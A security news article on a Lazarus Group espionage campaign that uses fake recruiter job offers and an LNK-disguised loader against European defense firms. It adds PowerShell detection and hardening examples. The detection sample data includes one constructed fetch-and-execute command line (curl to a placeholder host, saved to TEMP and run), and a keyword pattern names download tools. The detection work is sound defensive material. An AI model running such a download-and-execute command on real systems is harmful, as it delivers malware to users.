North Korean Hackers Target European Defense Firms to Steal Drone Secrets
A sophisticated cyber espionage campaign is actively targeting European aerospace and defense companies, with the primary goal of stealing sensitive military technology, particularly related to unmanned aerial vehicles (UAVs). This operation has been attributed to the Lazarus Group, a notorious state-sponsored hacking collective with established ties to North Korea.
The attacks demonstrate a calculated and persistent effort to acquire advanced technical data, blueprints, and strategic intelligence from some of the world’s leading defense contractors. By focusing on the UAV sector, the campaign highlights the critical importance of drone technology in modern warfare and intelligence gathering.
The Attack Method: Deceptive Job Offers
The primary infiltration method relies on highly targeted social engineering. The attackers have adopted a well-honed tactic of impersonating legitimate recruiters from major defense and technology firms, including BAE Systems, General Dynamics, and Northrop Grumman.
The process typically begins on professional networking platforms like LinkedIn, where attackers identify and approach employees with specific, desirable skill sets. After making initial contact, they lure the target away from the platform to encrypted messaging apps like WhatsApp or Slack, under the guise of continuing the recruitment process.
Key to this strategy is the attackers’ use of fake, yet convincing, job offers. They present malicious documents disguised as detailed job descriptions or assessments. Once the victim opens the file, the infection process begins, establishing a hidden backdoor into the company’s network.
A New Weapon in the Arsenal: ORACLEPRO Malware
This campaign is distinguished by the use of a newly identified malware loader named ORACLEPRO. This piece of software acts as the initial foothold for the attackers, designed to be stealthy and effective at bypassing initial security layers.
When a victim opens the malicious document—often a LNK file masquerading as a PDF—it executes a script that downloads and runs the ORACLEPRO loader. The malware is designed to perform a critical function: it establishes a connection with a command-and-control (C2) server operated by the hackers. From there, it can download and install additional, more powerful malware designed for data theft, network reconnaissance, and long-term persistence.
The malware cleverly bypasses User Account Control (UAC) security prompts to operate with elevated permissions. This technique allows it to execute commands and install subsequent payloads without triggering standard security warnings that might alert the user or IT staff to the intrusion.
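The process chain described above (shortcut opened from Explorer, script host launched, loader fetched from a remote server) is what an EDR or SIEM rule would look for. The following PowerShell is an added example written for this page, not code from the article, from the researchers who reported the campaign, or from any vendor product. It evaluates process-creation records against that chain; the three records are constructed sample data shaped like Sysmon Event ID 1 fields, the field names (ParentImage, Image, CommandLine) and the example.invalid URL are assumptions, and nothing here is real telemetry from the campaign.

```powershell
# Added example: flag process-creation records matching the chain
# Explorer -> script host -> remote download. Sample records are constructed.
$scriptHosts = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe',
               'cscript.exe', 'mshta.exe', 'rundll32.exe'

function Test-SuspiciousLnkChain {
    param([pscustomobject]$Event)
    # Compare on bare executable names so path differences do not matter
    $parent = [IO.Path]::GetFileName($Event.ParentImage).ToLower()
    $child  = [IO.Path]::GetFileName($Event.Image).ToLower()

    $fromExplorer  = $parent -eq 'explorer.exe'          # user double-clicked something
    $isScriptHost  = $scriptHosts -contains $child        # interpreter, not a document viewer
    $fetchesRemote = $Event.CommandLine -match 'https?://|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|bitsadmin'

    return ($fromExplorer -and $isScriptHost -and $fetchesRemote)
}

# Constructed sample records (assumed Sysmon-style field names):
$samples = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c curl http://example.invalid/a -o %TEMP%\a.exe && %TEMP%\a.exe' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Program Files\Adobe\Acrobat\Acrobat.exe'
                       CommandLine = '"Acrobat.exe" "C:\Users\u\Downloads\Job_Offer.pdf"' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\services.exe'
                       Image       = 'C:\Windows\System32\svchost.exe'
                       CommandLine = 'svchost.exe -k netsvcs' }
)

# Only the first record should be reported: a genuine PDF opened in a viewer
# and a normal service host are left alone.
$samples | Where-Object { Test-SuspiciousLnkChain $_ } | Select-Object Image, CommandLine
```

In production the same function would be fed from Get-WinEvent on the Sysmon operational log or from the EDR's own query language; the point is the three-part condition (interactive parent, interpreter child, network fetch in the command line), which is robust to renamed loaders and changing C2 addresses. The UAC bypass mentioned above would show up later in the chain as the interpreter or loader spawning a child at high integrity without a consent prompt, which most EDRs track as a separate signal.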
The Strategic Goal: Acquiring Advanced Military Technology
The focus on aerospace and defense firms is not random. It represents a clear state-sponsored objective to bridge technology gaps by stealing intellectual property rather than investing in years of expensive research and development.
This campaign is a clear indicator of efforts to advance North Korea’s own military capabilities, particularly in the realm of UAVs. By stealing cutting-edge designs and operational data, the nation can accelerate its drone program for both surveillance and combat purposes, posing a significant geopolitical and security risk. The theft of such information undermines the technological superiority of European nations and their allies.
How to Defend Against These Sophisticated Attacks
The defense industry remains a high-value target for state-sponsored espionage. Protecting against these threats requires a multi-layered security approach combining technology, processes, and employee education.
Heighten Employee Awareness: Train employees to recognize the signs of social engineering. Be extremely cautious of unsolicited job offers, especially those that quickly attempt to move the conversation to personal messaging apps. Verify the recruiter’s identity through official company channels before sharing any information.
Scrutinize All Documents: Never open attachments or click links from unverified sources. Configure systems to show full file extensions to help identify disguised malicious files (e.g., Job_Offer.pdf.lnk).
Disable Macros: Implement a policy to disable macros from running in Microsoft Office documents originating from the internet. The vast majority of malware delivered via documents relies on macros for execution.
Implement Advanced Endpoint Security: Use a robust Endpoint Detection and Response (EDR) solution. These tools are designed to detect and block the suspicious behaviors exhibited by malware like ORACLEPRO, such as unusual process execution or C2 communications.
Enforce Application Control: Use application whitelisting tools to prevent unauthorized or unknown executables from running on company workstations and servers.
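Two of the items above (showing full extensions, blocking internet-sourced macros) are single registry-backed settings, and the disguised-file check can be scripted. The PowerShell below is an added example for this page, not code from the article or from any vendor; the registry locations are the documented Explorer and Office policy keys (the 16.0 version path covers Office 2016 and later, including Microsoft 365), and the Downloads folder used in the final call is an assumed scan target.

```powershell
# Added example: apply two of the hardening items above and scan for disguised files.

# 1. Show full file extensions so "Job_Offer.pdf.lnk" is not displayed as "Job_Offer.pdf".
#    Explorer reads this value on start, so sign out or restart explorer.exe afterwards.
$explorer = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
Set-ItemProperty -Path $explorer -Name 'HideFileExt' -Value 0 -Type DWord

# 2. Block macros in Office files that carry the Mark of the Web (downloaded from the internet).
#    This mirrors the Group Policy "Block macros from running in Office files from the Internet";
#    in a managed estate it is normally pushed by GPO or Intune rather than set per machine.
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord
}

# 3. Find files whose name ends in a document-looking extension followed by a
#    shortcut or script extension, and note whether they were downloaded (Zone.Identifier stream).
function Find-DisguisedFiles {
    param([Parameter(Mandatory)][string]$Path)
    $docThenExec = '\.(pdf|docx?|xlsx?|pptx?|txt)\.(lnk|exe|scr|js|vbs|hta|bat|cmd)$'
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match $docThenExec } |
        ForEach-Object {
            $zone = Get-Content -Path $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
            [pscustomobject]@{
                File          = $_.FullName
                RealExtension = $_.Extension
                MarkOfTheWeb  = [bool]$zone   # $true if the file came from the internet zone
            }
        }
}

# Assumed scan target; point this at any user-writable drop location.
Find-DisguisedFiles -Path "$env:USERPROFILE\Downloads"
```

The scan is a hygiene check, not a substitute for the EDR and application-control items above: a shortcut named Job_Offer.lnk with a PDF icon would not match the double-extension pattern, which is exactly why showing extensions and restricting what can execute matter more than name-based filtering.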
The Lazarus Group continues to evolve its tactics, demonstrating a high level of sophistication and persistence. For organizations in the defense sector, maintaining a constant state of vigilance and implementing proactive security measures is not just a best practice—it is an operational necessity.
Source: https://securityaffairs.com/183783/apt/lazarus-targets-european-defense-firms-in-uav-themed-operation-dreamjob.html